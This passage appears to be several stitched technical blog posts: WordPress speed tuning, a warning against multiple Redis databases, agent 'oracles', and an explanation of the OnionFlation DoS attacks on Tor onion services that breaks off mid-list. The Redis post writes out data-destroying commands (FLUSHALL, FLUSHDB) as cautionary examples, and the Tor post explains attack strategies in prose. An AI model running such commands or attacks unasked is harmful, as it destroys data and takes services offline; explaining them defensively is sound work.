On a typical blog, this step alone drops total image payload by 60–80%. Run it, clear your cache, and re-run PageSpeed before touching anything else. On this site, 847 images went from an average of 380 KB down to 62 KB.
Case 2: Images Without Width and Height Attributes (CLS Killer)
The browser cannot reserve space for an image before it downloads if the HTML does not declare its dimensions. The result: as images load in, everything below them jumps down the page. Google counts every pixel of that shift against your CLS score.
WordPress 5.5+ adds these attributes for images inserted via the block editor, but anything in post content from older posts, theme templates, or plugins is a wildcard. The fix is a PHP content filter that scans every <img> tag and injects the intrinsic dimensions when they are missing.
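The scan-and-inject logic itself is language-agnostic; here it is sketched in Python, with the dimension lookup left as a caller-supplied stand-in (the production version would live in a PHP content filter):

```python
import re

def inject_dimensions(html, lookup):
    """Add width/height to <img> tags that lack them.
    lookup(src) returns (width, height) or None."""
    def fix(match):
        tag = match.group(0)
        if "width=" in tag and "height=" in tag:
            return tag  # already sized, leave it alone
        src = re.search(r'src="([^"]+)"', tag)
        if not src:
            return tag
        dims = lookup(src.group(1))
        if not dims:
            return tag  # unknown image: better to skip than to guess
        w, h = dims
        end = "/>" if tag.endswith("/>") else ">"
        return tag[: -len(end)] + f' width="{w}" height="{h}"' + end
    return re.sub(r"<img\b[^>]*>", fix, html)

html = '<p><img src="/uploads/hero.jpg"></p>'
fixed = inject_dimensions(html, lambda src: (1600, 900))
print(fixed)  # <p><img src="/uploads/hero.jpg" width="1600" height="900"></p>
```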
The browser’s preload scanner will not discover a CSS background image or a lazily-loaded image until it builds the render tree. If your LCP element is a featured image, preload it in the <head> so the browser fetches it at the same time as the HTML:
add_action( 'wp_head', 'sudoall_preload_lcp_image', 1 );
function sudoall_preload_lcp_image() {
    if ( ! is_singular() ) return;
    $thumb_id = get_post_thumbnail_id();
    if ( ! $thumb_id ) return;
    $src = wp_get_attachment_image_url( $thumb_id, 'large' );
    if ( $src ) {
        echo '<link rel="preload" as="image" href="' . esc_url( $src ) . '">' . "\n";
    }
}
The full caching stack: each layer eliminates a different class of latency.
Layer 2: The Caching Stack
WordPress without caching is a PHP application that rebuilds every page from scratch on every request: parse PHP, load plugins, run sixty-odd database queries, render templates, and flush the output buffer to the client. A modern server can do this in 200–400 ms on a good day. Under any real traffic, MySQL connection queues start forming and TTFB climbs past 800 ms. Add the time for a mobile browser on 4G to receive and render those bytes and you have a 3-second LCP before the CSS even loads.
The solution is layered caching. Think of each layer as an earlier exit that avoids all the work below it.
PHP OPcache (Bytecode Caching)
PHP compiles every source file to bytecode before executing it. Without OPcache, this happens on every request. With OPcache enabled, the compiled bytecode is stored in shared memory and reused. For a WordPress site with hundreds of PHP files across core, plugins, and the theme, this is a substantial saving.
; In php.ini or a custom opcache.ini
opcache.enable=1
opcache.memory_consumption=128
opcache.interned_strings_buffer=16
opcache.max_accelerated_files=10000
opcache.revalidate_freq=60
opcache.fast_shutdown=1
Verify it is active inside the container: docker exec your-wordpress-container php -r "echo opcache_get_status()['opcache_enabled'] ? 'OPcache ON' : 'OFF';"
Redis Object Cache (Database Query Caching)
WordPress calls $wpdb->get_results() for things like sidebar widget listings, navigation menus, and term lookups on every page. Redis Object Cache (the plugin by Till Krüss) hooks into WordPress’s WP_Object_Cache API and stores query results in Redis, a sub-millisecond in-memory store. Repeat queries skip the database entirely.
After connecting Redis, activate the Redis Object Cache plugin from the WordPress admin. The first page load primes the cache; subsequent loads skip the DB for cached data.
WP Super Cache (Full-Page Static HTML)
The deepest cache, and the most impactful for TTFB. WP Super Cache writes the fully rendered HTML of each page to disk as a static file. Apache (via mod_rewrite) serves this file directly, bypassing PHP and MySQL entirely. A cached page response time drops from 200–400 ms to under 5 ms.
# .htaccess – serve cached static files directly via mod_rewrite
# (WP Super Cache generates these rules; this is the HTTPS variant)
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_METHOD} !POST
RewriteCond %{QUERY_STRING} ^$
RewriteCond %{HTTP:Cookie} !^.*(comment_author|wordpress_[a-f0-9]+|wp-postpass).*$
RewriteCond %{HTTPS} on
RewriteCond %{DOCUMENT_ROOT}/wp-content/cache/supercache/%{HTTP_HOST}%{REQUEST_URI}index-https.html -f
RewriteRule ^ wp-content/cache/supercache/%{HTTP_HOST}%{REQUEST_URI}index-https.html [L]
Cache Warm-Up: Don’t Leave Visitors on the Cold Path
The first visitor to any page after a cache flush or server restart hits the full PHP stack. For a blog with 100 published posts, that is 100 potential cold-hit requests. The fix is a warm-up script that crawls all published URLs immediately after any flush:
#!/bin/bash
# warm-cache.sh – pre-warm WP Super Cache for all published posts and pages
URLS=$(mysql -h 127.0.0.1 -u root -p"${MYSQL_ROOT_PASSWORD}" sudoall_prod \
  -se "SELECT CONCAT('https://sudoall.com/', post_name) FROM wp_posts \
       WHERE post_status='publish' AND post_type IN ('post','page');")
echo "$URLS" | xargs -P8 -I{} curl -s -o /dev/null -w "%{url_effective} %{http_code}\n" {}
echo "Cache warm-up complete."
Schedule this with cron: 5 * * * * /srv/www/site/warm-cache.sh. Every hour, right after the cache TTL expires, it re-primes all pages.
Core Web Vitals: each metric maps to a specific user experience moment.
Layer 3: JavaScript and CSS Delivery
A browser can only do one thing at a time on the main thread. A <script> tag without defer or async halts HTML parsing completely until the script is downloaded, compiled, and executed. Stack ten plugins each adding a synchronous script to the <head> and your TBT climbs into the hundreds of milliseconds before the user sees a single pixel.
Defer Non-Critical JavaScript
WordPress’s script_loader_tag filter lets you inject defer or async onto any registered script handle. Add defer to everything that doesn’t need to run before the DOM is painted.
WordPress loads jquery-migrate by default as a compatibility shim for plugins still using deprecated jQuery APIs from the 1.x era. If your theme and plugins don’t need it, it is dead weight on every page load. The correct removal (without breaking jQuery) is via the wp_default_scripts action, which lets you strip jquery-migrate from jQuery’s dependency list before any scripts are printed.
If your blog has code blocks, you’re probably loading a syntax highlighter like highlight.js on every page, including pages with no code at all. The fix: use IntersectionObserver to load the highlighter only when a <pre><code> block actually enters the viewport.
document.addEventListener('DOMContentLoaded', function () {
  var codeBlocks = document.querySelectorAll('pre code');
  if (!codeBlocks.length) return; // no code on this page – don't load anything

  function loadHighlighter() {
    if (window._hljs_loaded) return;
    window._hljs_loaded = true;
    var link = document.createElement('link');
    link.rel = 'stylesheet';
    link.href = '/wp-content/themes/your-theme/css/arcaia-dark.css';
    document.head.appendChild(link);
    var script = document.createElement('script');
    script.src = '/wp-content/plugins/...highlight.min.js';
    script.onload = function () { hljs.highlightAll(); };
    document.head.appendChild(script);
  }

  if ('IntersectionObserver' in window) {
    var obs = new IntersectionObserver(function (entries) {
      entries.forEach(function (e) { if (e.isIntersecting) { loadHighlighter(); obs.disconnect(); } });
    });
    codeBlocks.forEach(function (el) { obs.observe(el); });
  } else {
    setTimeout(loadHighlighter, 2000); // fallback for older browsers
  }
});
Async Load Non-Critical CSS
Google Fonts, icon libraries, and syntax-highlight stylesheets are not needed before the first paint. The media="print" trick loads them asynchronously: a print stylesheet is non-blocking, and the onload handler switches it to all once it has downloaded.
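In markup form the trick looks like this; the font URL is a placeholder, and the noscript fallback covers visitors with JavaScript disabled:

```html
<link rel="stylesheet"
      href="https://fonts.googleapis.com/css2?family=Inter&display=swap"
      media="print" onload="this.media='all'">
<noscript>
  <link rel="stylesheet"
        href="https://fonts.googleapis.com/css2?family=Inter&display=swap">
</noscript>
```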
Important caveat: do not async-load any CSS that controls above-the-fold layout. If Bootstrap or your grid system loads asynchronously, elements will visibly jump as it arrives, spiking your CLS score. Layout-critical CSS must stay synchronous or be inlined in the <head>.
Remove Unused Block Library CSS
If you don’t use Gutenberg blocks on the front-end, WordPress is loading wp-block-library.css (and related stylesheets) on every page for nothing. Dequeue them with wp_dequeue_style() on the wp_enqueue_scripts hook.
Deferred vs blocking scripts: the same assets, in the same order, with a completely different effect on main-thread availability.
Layer 4: Browser Caching and Static Asset Versioning
Every returning visitor should get CSS, JS, fonts, and images from their local browser cache, not your server. Without explicit cache headers, most browsers apply heuristic caching, which is inconsistent and often too short. Set them explicitly in .htaccess:
<IfModule mod_expires.c>
ExpiresActive On
ExpiresByType text/css "access plus 1 year"
ExpiresByType application/javascript "access plus 1 year"
ExpiresByType image/jpeg "access plus 1 year"
ExpiresByType image/png "access plus 1 year"
ExpiresByType image/webp "access plus 1 year"
ExpiresByType font/woff2 "access plus 1 year"
ExpiresByType text/html "access plus 1 hour"
</IfModule>
<IfModule mod_headers.c>
<FilesMatch "\.(css|js|jpg|jpeg|png|webp|woff2|gif|ico|svg)$">
Header set Cache-Control "public, max-age=31536000, immutable"
</FilesMatch>
</IfModule>
One year is fine for assets provided you bust the cache when they change. The standard approach: append a version query string. The common mistake in WordPress themes is using time() as the version, which generates a new query string on every page load and defeats caching entirely:
// ✗ This busts the cache on every single request
wp_enqueue_style( 'my-theme', get_stylesheet_uri(), [], time() );
// ✓ This respects the cache until you actually change the file
wp_enqueue_style( 'my-theme', get_stylesheet_uri(), [], '1.2.6' );
“The ‘immutable’ extension in a Cache-Control response header indicates to a client that the response body will not change over time… clients should not send conditional revalidation requests for the response.” – RFC 8246, HTTP Immutable Responses
When These Optimisations Are Overkill
Not every site needs all of this. If you run a private internal tool, a staging site, or a low-traffic blog where perceived performance genuinely doesn’t matter, a full caching stack is added complexity for no real user benefit. Redis and WP Super Cache both introduce cache invalidation problems: publish a post, and the homepage is stale until the next warm-up. For a site with a small team editing content frequently, you’ll spend more time debugging stale pages than you save in load times.
Similarly, the async CSS trick is wrong for sites where the theme’s layout CSS is above-the-fold critical. Apply it only to supplementary stylesheets like icon libraries and syntax themes. When in doubt, keep layout CSS synchronous and async everything else.
What to Check Right Now
Run PageSpeed Insights – pagespeed.web.dev on your homepage. Identify your worst metric: is it TBT (JavaScript), LCP (images or no cache), or CLS (missing dimensions)?
Check image sizes – find /var/www/html/wp-content/uploads -name "*.jpg" -size +500k | wc -l from inside your container. If the count is more than 0, start with mogrify.
Verify OPcache – php -r "var_dump(opcache_get_status()['opcache_enabled']);" inside the PHP container. Should be bool(true); note that the CLI only reports true when opcache.enable_cli is on, so a false here may just mean the CLI cache is disabled.
Check for jquery-migrate – view source on your homepage and search for jquery-migrate in the script tags. If it is there and your theme doesn’t need legacy jQuery, remove it.
Check time() in enqueue calls – grep -r "time()" wp-content/themes/your-theme/. Replace any occurrence used as a version number with a static string.
Verify Cache-Control headers – curl -I https://yourdomain.com/wp-content/themes/your-theme/style.css | grep -i cache. You should see max-age=31536000.
Check for full-page caching – curl -s -I https://yourdomain.com/ | grep -i x-cache. If WP Super Cache is working, the response should come back in under 20 ms from a warm cache.
Protect your theme from WP updates – add Update URI: false to style.css and use a must-use plugin to filter site_transient_update_themes if the theme has a unique slug that could match a public theme.
Redis is one of those tools you adopt on a Monday and depend on completely by Thursday. It’s fast, it’s simple, and its data structures make your brain feel big. But buried inside Redis is a feature that has been silently causing production incidents for years: multiple logical databases within a single instance. You’ve probably used it. You might be using it right now. And there’s a very good chance it’s going to bite you at the worst possible moment.
Multiple Redis databases: they look separate, but they live in the same house and share everything
What Redis Databases Actually Are
By default, Redis ships with 16 logical databases, numbered 0 through 15 (the count is configurable via the databases directive). You switch between them using the SELECT command. Each database has its own keyspace, which means a key named user:1 in database 0 is completely separate from user:1 in database 5. On the surface this looks like proper isolation. It is not.
The Redis documentation itself is blunt about this. From the official docs on SELECT:
“Redis databases should not be used as a way to separate different application data. The proper way to do this is to use separate Redis instances.” – Redis documentation, SELECT command
This isn’t buried in a footnote. It’s right there in the command reference. And yet, multiple databases are everywhere in production. Why? Because they’re convenient. Running one Redis process is simpler than running three. And the keyspace separation looks exactly like the isolation you actually need.
# This looks clean and organised
redis-cli -n 0    # application sessions        (equivalent to SELECT 0)
redis-cli -n 5    # background pipeline processing
redis-cli -n 10   # lightweight caching
# What you think you have: three isolated stores
# What you actually have: three buckets in one leaking tank
The Shared Resource Problem: What Actually Goes Wrong
Every Redis database within a single instance shares the same server process. That means one pool of memory, one CPU thread (Redis is single-threaded for commands), one network socket, one set of configuration limits. When you SELECT a different database number, you’re not switching to a different process. You’re just telling Redis to look in a different keyspace. The underlying machinery is identical.
Kleppmann in Designing Data-Intensive Applications explains why this matters at a systems level: shared resources without isolation boundaries mean a fault in one subsystem propagates to all others. He’s talking about distributed systems broadly, but the principle applies here with brutal precision. Your databases are not subsystems. They are namespaces sharing a single subsystem.
Here is what that looks like in practice.
Case 1: Memory Eviction Wipes Your Cache
You configure a single Redis instance with maxmemory 4gb and maxmemory-policy allkeys-lru. You use database 5 for pipeline job queues and database 10 for caching API responses. Your pipeline goes through a burst period and starts writing thousands of large job payloads into database 5.
# redis.conf
maxmemory 4gb
maxmemory-policy allkeys-lru
# Your pipeline flooding database 5
import redis

r = redis.Redis(db=5)
for job in burst_of_10k_jobs:
    r.set(f"job:{job.id}", job.payload, ex=3600)  # big payloads

# Meanwhile in your web app...
cache = redis.Redis(db=10)
result = cache.get("api:products:page:1")  # returns None – evicted
# Cache miss. Your DB gets hammered.
When Redis hits the memory limit it runs LRU eviction across all keys in all databases. It doesn’t know or care that database 10’s cache keys are serving live user traffic. It just evicts whatever is least recently used. Your carefully populated cache gets gutted to make room for the pipeline. Cache hit rate goes from 85% to 12%. Your database gets hammered. Everyone’s pager goes off at 2am.
This is not a hypothetical. It’s a well-documented operational failure mode.
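You can watch this failure mode without a Redis server. Below is a toy model of a single shared LRU pool holding keys from two “databases”; it illustrates the shared-eviction behaviour, not Redis’s actual eviction code:

```python
from collections import OrderedDict

class SharedLRUPool:
    """One memory pool, LRU eviction across every namespace – like
    maxmemory-policy allkeys-lru applied to all 16 databases at once."""
    def __init__(self, max_keys):
        self.max_keys = max_keys
        self.data = OrderedDict()

    def set(self, db, key, value):
        full = (db, key)
        self.data[full] = value
        self.data.move_to_end(full)
        while len(self.data) > self.max_keys:
            self.data.popitem(last=False)  # evict LRU, whichever db it lives in

    def get(self, db, key):
        full = (db, key)
        if full not in self.data:
            return None
        self.data.move_to_end(full)
        return self.data[full]

pool = SharedLRUPool(max_keys=100)
pool.set(10, "api:products:page:1", "cached response")  # the cache, db 10
for i in range(100):                                    # pipeline burst, db 5
    pool.set(5, f"job:{i}", "payload")
print(pool.get(10, "api:products:page:1"))  # None – the burst evicted it
```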
Case 2: FLUSHDB Takes Down More Than You Planned
You’re cleaning up stale test data. You connect to what you think is the test database and run FLUSHDB. Redis flushes database 0. Your sessions are in database 0. Your production users are now all logged out simultaneously.
# Developer runs this thinking they're on the test DB
redis-cli -n 0 FLUSHDB
# But your sessions were also on DB 0
# Every logged-in user just got kicked out
# Support tickets: many
With separate instances, this failure mode is impossible. You’d have to explicitly connect to the production instance and deliberately flush it. The separate instance is an actual boundary. The database number is just a label.
Case 3: FLUSHALL Is Always a Disaster
Someone runs FLUSHALL to clean up a database. FLUSHALL wipes every database in the instance. It doesn’t ask which one. If all your databases are in one Redis instance, this single command takes out everything: your sessions, your pipeline queues, your caches, your temporary data. Everything. Simultaneously.
# Looks like it's cleaning just one thing
redis-cli FLUSHALL # deletes EVERY database (0 through 15)
# Equivalent damage: one wrong command vaporises
#   db 0:  sessions – all users logged out
#   db 5:  pipeline – all queued jobs lost
#   db 10: cache – cache cold, DB under full load
Case 4: A Slow Operation Blocks Everything
Redis is single-threaded for command execution. A slow operation in one database blocks commands in all other databases. You’re running a large KEYS * scan in database 5 during maintenance (yes, you know not to do this, but someone does it anyway). It takes 800ms. For 800ms, every GET in database 10 queues up. Your cache layer is unresponsive. Your application timeout counters tick.
# Someone runs this on db 5 "just to debug something"
redis-cli -n 5 KEYS "*pipeline*"
# Returns after 800ms
# During those 800ms, database 10 clients are blocked:
cache.get("user:session:abc123") # waiting... waiting...
# Your app's 500ms timeout fires
# HTTP 504 responses hit your users
With separate instances, a blocked db 5 instance doesn’t touch db 10’s instance. The processes are independent.
One process, one thread, one memory pool: a bad day in database 5 is a bad day everywhere
The Redis Cluster Problem: A Hard Wall
Here’s a constraint that isn’t optional or configurable. Redis Cluster, which is the standard approach for horizontal scaling and high availability in production, only supports database 0.
“Redis Cluster supports a single database, and the SELECT command is not allowed.” – Redis Cluster specification
If you’ve built your application around multiple database numbers and you later need to scale horizontally with Redis Cluster, you’re stuck. You have to refactor your data access layer, migrate your keys, and retest everything. The cost of the “convenient” multi-database approach arrives as a large refactoring bill exactly when you can least afford it: when your traffic is growing.
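If Cluster is on your roadmap, the usual cluster-compatible substitute for SELECT is key prefixing on database 0. A trivial sketch, with hypothetical namespace names:

```python
def ns(namespace, key):
    """Cluster-safe namespacing: everything lives in db 0,
    separated by prefix instead of database number."""
    return f"{namespace}:{key}"

# instead of SELECT 5 / SELECT 10:
job_key = ns("pipeline", "job:42")               # "pipeline:job:42"
cache_key = ns("cache", "api:products:page:1")   # "cache:api:products:page:1"
```

Prefixes restore the namespace separation but none of the resource isolation; separate instances remain the real fix for divergent workloads.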
The Proper Pattern: Separate Instances
The correct approach is to run a separate Redis instance for each logical use case. This is not complicated. Redis has a tiny footprint. Running three instances uses almost no additional overhead compared to running one with three databases.
# redis-pipeline.conf
port 6380
maxmemory 1gb
maxmemory-policy noeviction # pipeline jobs must NOT be evicted
save 900 1 # persist pipeline jobs to disk
# redis-cache.conf
port 6381
maxmemory 2gb
maxmemory-policy allkeys-lru # cache should evict LRU freely
save "" # no persistence needed for cache
# redis-sessions.conf
port 6382
maxmemory 512mb
maxmemory-policy volatile-lru # only evict keys with TTL set
save 60 1000 # persist sessions more aggressively
Notice what this gives you that you absolutely cannot have with multiple databases. Each instance has its own maxmemory and its own maxmemory-policy. Your pipeline instance uses noeviction because job loss is unacceptable. Your cache instance uses allkeys-lru because cache misses are fine. Your session instance uses volatile-lru and persists aggressively. These policies are mutually exclusive requirements. You cannot satisfy them with a single configuration file.
# Application connections β clean and explicit
import redis
pipeline_redis = redis.Redis(host='localhost', port=6380)
cache_redis = redis.Redis(host='localhost', port=6381)
session_redis = redis.Redis(host='localhost', port=6382)
# Now a pipeline burst doesn't evict cache entries
# A FLUSHDB on cache doesn't touch sessions
# A slow pipeline scan doesn't block session lookups
# Each can scale, replicate, and fail independently
The Pragmatic Programmer’s core principle of orthogonality applies perfectly here: components that have nothing to do with each other should not share internal state. Your pipeline and your cache are orthogonal concerns. Coupling them through a shared Redis process violates that principle, and you pay for the violation eventually.
Separate instances: different ports, different configs, different memory policies, zero cross-contamination
How to Migrate Away From Multiple Databases
If you’re already using multiple databases in production, the migration is straightforward but requires care. Here’s the logical path.
Step 1: Inventory your databases. Connect to your Redis instance and check what’s actually living in each database.
# Check key counts per database
redis-cli INFO keyspace
# Output shows something like:
# db0:keys=1240,expires=1100,avg_ttl=86300000
# db5:keys=340,expires=340,avg_ttl=3598000
# db10:keys=5820,expires=5820,avg_ttl=299000
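If you want that inventory as data rather than eyeballs, the keyspace section of INFO is easy to parse. A small Python sketch over the sample output above:

```python
def parse_keyspace(info_text):
    """Parse the '# Keyspace' lines of INFO into {db: {field: int}}."""
    result = {}
    for line in info_text.splitlines():
        line = line.strip()
        if not line.startswith("db"):
            continue
        db, fields = line.split(":", 1)
        result[db] = {
            k: int(v) for k, v in
            (pair.split("=") for pair in fields.split(","))
        }
    return result

sample = """db0:keys=1240,expires=1100,avg_ttl=86300000
db5:keys=340,expires=340,avg_ttl=3598000
db10:keys=5820,expires=5820,avg_ttl=299000"""
print(parse_keyspace(sample)["db5"]["keys"])  # 340
```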
Step 2: Start new instances before touching the old one. Spin up your new Redis instances with appropriate configs for each use case. Don’t migrate anything yet.
Step 3: Dual-write during transition. Update your application to write to both the old database number and the new dedicated instance. Reads still come from the old instance. This gives you a warm new instance without a cold-start cache miss storm.
# Transition period: write to both, read from old
old_redis = redis.Redis(db=10)             # legacy database number
new_cache_redis = redis.Redis(port=6381)   # dedicated cache instance

def set_cache(key, value, ttl):
    old_redis.setex(key, ttl, value)
    new_cache_redis.setex(key, ttl, value)  # warm the new instance

def get_cache(key):
    return old_redis.get(key)  # still reading from old
Step 4: Flip reads, then remove dual-write. Once the new instance has a reasonable warm state, flip reads to the new instance. Monitor cache hit rates. Once stable for a day or two, remove the dual-write to the old database number.
Step 5: Verify and clean up. After all traffic is on dedicated instances, verify the old database numbers are empty and decommission them.
The migration path: inventory, spin up, dual-write, flip, clean up
When Multiple Databases Are Actually Fine
It would be unfair to say multiple databases are always wrong. There are genuine use cases:
Local development and unit tests – when you want to isolate test data from dev data on a single machine without the overhead of multiple processes. Database 0 for your running dev server, database 1 for tests that get flushed between runs.
Organisational separation within a single application – separating sessions, cache, and queues within one application that has identical resource requirements and tolerates the same eviction policy. This is the original intended use case.
Very small applications with negligible traffic – where the Redis instance is nowhere near its limits and you simply want namespace separation without the operational overhead.
The moment you have meaningfully different workloads, different eviction requirements, or need horizontal scaling, multiple databases stop being an organisational convenience and start being a liability.
What to Check Right Now
Run INFO keyspace – if you see more than db0 in production with significant key counts, you have work to do.
Check your maxmemory-policy – one policy cannot serve all use cases correctly. If you have both pipeline jobs and cache data, you need different policies.
Check for Redis Cluster in your roadmap – if it’s there, multiple databases will block you. Start planning the migration now, before you need to scale.
Audit your FLUSHDB and FLUSHALL usage – in scripts, Makefiles, CI pipelines, anywhere. Know exactly what would be affected if one of those runs in the wrong context.
Review slow query logs – check if slow commands in one database are causing latency spikes visible in your application metrics at the same timestamps.
Redis is an extraordinary tool. It earns its place in almost every production stack. But its database feature was designed for a simpler era when “run one Redis for everything” was the standard advice. The standard has moved on. Your architecture should too.
An “oracle” in this context is a component that knows something the LLM doesn’t – typically the structure of the system. The agent edits code or config; the oracle has a formal model (e.g. states, transitions, invariants) and can answer questions like “is there a stuck state?” or “does every path have a cleanup?” The oracle doesn’t run the code; it reasons over the declared structure. So the agent has a persistent, queryable source of truth that survives across sessions and isn’t stored in the model’s context window. That’s “persistent architectural memory.”
Why it helps: the agent (or the human) can ask the oracle before or after a change. “If I add this transition, do I introduce a dead end?” “Which states have no error path?” The oracle answers from the formal model. So you’re not relying on the agent to remember or infer the full structure; you’re relying on a dedicated store that’s updated when the structure changes and queried when you need to verify or plan. The agent stays in the “how do I implement?” role; the oracle is in the “what is the shape?” role.
Building an oracle means maintaining a representation of the system (states, transitions, maybe invariants) that stays in sync with the code or config. That can be manual (you write the spec) or semi-automated (the agent or a tool proposes updates to the spec when code changes). The oracle then runs checks or answers queries over that representation. For agentic systems, the oracle is the “memory” that the agent lacks: a place to look up structural facts instead of re-deriving them from source every time.
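As a concrete sketch, here is a minimal such oracle in Python over a hypothetical deployment state machine; the states and queries are illustrative, not a prescribed schema:

```python
class StateMachineOracle:
    """Holds a formal model (states, transitions, terminals) and answers
    structural questions without executing any code."""
    def __init__(self, transitions, terminals):
        self.transitions = transitions   # state -> set of next states
        self.terminals = terminals       # states that are allowed to be final

    def stuck_states(self):
        """Non-terminal states with no way out."""
        return {
            s for s, nxt in self.transitions.items()
            if not nxt and s not in self.terminals
        }

    def states_without_error_path(self, error_state):
        """States from which the error/cleanup state is unreachable."""
        unreachable = set()
        for start in self.transitions:
            seen, frontier = set(), [start]
            while frontier:
                s = frontier.pop()
                if s in seen:
                    continue
                seen.add(s)
                frontier.extend(self.transitions.get(s, ()))
            if error_state not in seen:
                unreachable.add(start)
        return unreachable

# Hypothetical deployment workflow
oracle = StateMachineOracle(
    transitions={
        "idle": {"deploying"},
        "deploying": {"live", "failed"},
        "live": {"idle"},
        "failed": set(),   # oops: no cleanup transition out of "failed"
    },
    terminals=set(),
)
print(oracle.stuck_states())  # {'failed'}
```

The point is that the agent (or a human) can ask these questions before merging a change, instead of re-deriving the graph from source every time.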
The approach is especially useful when multiple agents or humans work on the same codebase. The oracle is the single source of truth for “what’s the intended structure?” so that everyone – human or agent – can check their changes against it.
Expect more tooling that provides oracle-like structural views and checks, and tighter integration with agentic workflows so that agents can query before they act.
Tor’s proof-of-work puzzle system was designed as the one reliable defence against denial-of-service attacks on onion services. It was clever, it worked, and then a group of security researchers spent the better part of a year figuring out how to turn it into a weapon. The resulting family of attacks, dubbed OnionFlation, can take down any onion service for roughly $1.20 upfront and 10 cents an hour to maintain. The Tor project has acknowledged the issue. It is not yet patched.
OnionFlation: weaponising Tor’s proof-of-work defence against the users it was built to protect.
Why Onion Services Have Always Been a DoS Magnet
Before understanding OnionFlation, you need to understand the original problem it was supposed to solve. Onion services have always been disproportionately easy to knock offline, and the reason is architectural. On the clearnet, denial-of-service defences rely on one thing above all else: knowing who is attacking you. Rate limiting, IP scrubbing, CAPTCHA walls, traffic shaping – all of these require visibility into the source of traffic. An onion service has none of that. The server never sees the client’s IP address; that is the entire point. So every standard DoS mitigation becomes inapplicable in one stroke.
The asymmetry goes further. When a malicious client wants to flood an onion service, it sends high-volume requests to the service’s introduction point over a single Tor circuit. But the server, upon receiving each request, must open a brand new Tor circuit to a different rendezvous point for every single one. Establishing a Tor circuit is computationally expensive: there is a full cryptographic key exchange at each hop. So the attacker pays once per circuit while the server pays once per request. This is the asymmetry that makes regular DoS against onion services so effective, and it has nothing to do with OnionFlation. It is just the baseline condition.
A quick detour is worth it here because the routing model is central to everything that follows. When you connect to a clearnet site over Tor, your traffic passes through three relays: a guard node, a middle node, and an exit node. The exit node then connects directly to the destination server, which sits outside Tor. The server’s IP address is public and the final hop is unencrypted (unless using HTTPS, but that is standard TLS at that point, nothing to do with Tor).
Onion services work differently. The server moves inside the Tor network. Before any clients connect, the server picks three ordinary Tor relays to act as introduction points and opens full three-hop Tor circuits to each of them. It then publishes a descriptor (containing its introduction points and its public key) into a distributed hash table spread across Tor’s network of directory servers. This is how clients discover how to reach the service.
When a client connects, the process looks like this:
# Simplified connection flow for an onion service
1. Client queries the distributed hash table for the onion URL
   → receives the list of introduction points
2. Client forms a 3-hop circuit to one introduction point
3. Client randomly selects a rendezvous point (any Tor relay)
   → forms a separate 2-hop circuit to it
   → sends the rendezvous point a secret "cookie" (a random token)
4. Client sends a message to the introduction point containing:
   - the rendezvous point's location
   - the cookie
   - all encrypted with the server's public key
5. Introduction point forwards the message to the server
6. Server forms a 3-hop circuit to the rendezvous point
   → presents the matching cookie
7. Rendezvous point stitches the two circuits together
   → client and server complete a cryptographic handshake
   → bidirectional encrypted communication begins
The end result is six hops total between client and server, with neither party knowing the other’s IP address. The rendezvous point is just blindly relaying encrypted traffic it cannot read. The price for this mutual anonymity is latency and, critically, the server-side cost of forming new Tor circuits on demand.
Six hops, two stitched circuits, zero IP exposure. The elegance that also creates the attack surface.
Tor’s Answer: Proof-of-Work Puzzles (2023)
In August 2023, after months of sustained DoS attacks against the Tor network, the Tor Project deployed a new defence: proof-of-work puzzles, specified in full in Proposal 327 and documented at the onion services security reference. The mechanism is conceptually simple. Before the server forms a rendezvous circuit, the client must first solve a cryptographic puzzle. The server adjusts the puzzle difficulty dynamically based on observed load, broadcasting the current difficulty level globally via the same distributed hash table used for descriptors.
Critically, the difficulty is global, not per-client. There is a reason for this: giving any individual feedback to a single client would require forming a circuit first, which is exactly the expensive operation we are trying to avoid. So the puzzle difficulty is a single number that all prospective clients must solve before the server will engage with them.
For a legitimate user making a single connection, a few extra seconds is a minor inconvenience. For an attacker trying to flood the server with hundreds of requests per second, the puzzle cost scales linearly and quickly becomes infeasible. The approach brilliantly flips the asymmetry: instead of the server bearing the circuit-formation cost, the attacker now bears a cryptographic puzzle cost for every single request it wants to send. According to the paper, under active attack conditions without PoW, 95% of clients could not connect at all. With PoW active, connection times under the same attack were nearly indistinguishable from a non-attacked baseline. It was, by any measure, a success.
OnionFlation: Weaponising the Defence
The paper Onions Got Puzzled, presented at USENIX Security 2025, identified a fundamental flaw in how the puzzle difficulty update algorithm works. Rather than trying to overpower the puzzle system, the attacks trick the server into raising its own puzzle difficulty to the maximum value (10,000) without actually putting it under meaningful load. Once the difficulty is at maximum, even high-end hardware struggles to solve a single puzzle within Tor Browser’s 90-second connection timeout.
The researchers developed four distinct attack strategies.
Strategy 1: EnRush
The server evaluates its congestion state once every five minutes, then broadcasts a difficulty update. It cannot do this more frequently because each update requires writing to the distributed hash table across Tor’s global relay network; frequent writes would overwhelm it.
The server’s congestion check looks at the state of its request queue at the end of the five-minute window. It checks not just how many requests are queued but their difficulty levels. A single high-difficulty unprocessed request is enough to trigger a large difficulty increase, because the server reasons: “if clients are solving hard puzzles and still can’t get through, congestion must be severe.”
The EnRush attacker simply sends a small burst of high-difficulty solved requests in the final seconds of the measurement window. For the vast majority of the five-minute interval the queue was empty, but the server only checks once. It sees high-difficulty requests sitting unprocessed, panics, and inflates the difficulty to the maximum. Cost: $1.20 per inflation event.
Strategy 2: Temporary Turmoil
Instead of sending a few hard requests, the attacker floods the server with a massive volume of cheap, low-difficulty requests. This exploits a flaw in the difficulty update formula:
The server’s request queue has a maximum capacity. When it fills up, the server discards half the queue to make room. When this happens, the numerator (all arrived requests, including discarded ones) becomes very large, while the denominator (only successfully processed requests) remains low. The formula outputs an absurdly high difficulty. Cost: $2.80.
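The flaw can be sketched roughly like this. This is a loose reconstruction from the paper's description: the function name, the multiplicative form, and the constants are illustrative, not Tor's actual code. The key point is only that discarded requests still count in the numerator while the denominator stays small.

```javascript
const MAX_DIFFICULTY = 10000;

// Loose reconstruction of the flawed update, per the paper's description.
// Numerator: effort from ALL arrived requests, including ones discarded
// when the queue overflowed. Denominator: only what was actually processed.
function updateDifficulty(totalEffortArrived, effortProcessed, current) {
  const ratio = totalEffortArrived / Math.max(effortProcessed, 1);
  return Math.min(Math.round(current * ratio), MAX_DIFFICULTY);
}

// Normal load: arrivals roughly match processing, difficulty holds steady.
console.log(updateDifficulty(100, 100, 20));    // 20

// Temporary Turmoil: a flood overflows the queue; half is discarded but
// still counted in the numerator, so the ratio explodes.
console.log(updateDifficulty(500000, 200, 20)); // 10000 (capped at max)
```

Whatever the exact formula in the implementation, the attack works because the two sides of the ratio are measured asymmetrically.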
Strategy 3: Choking
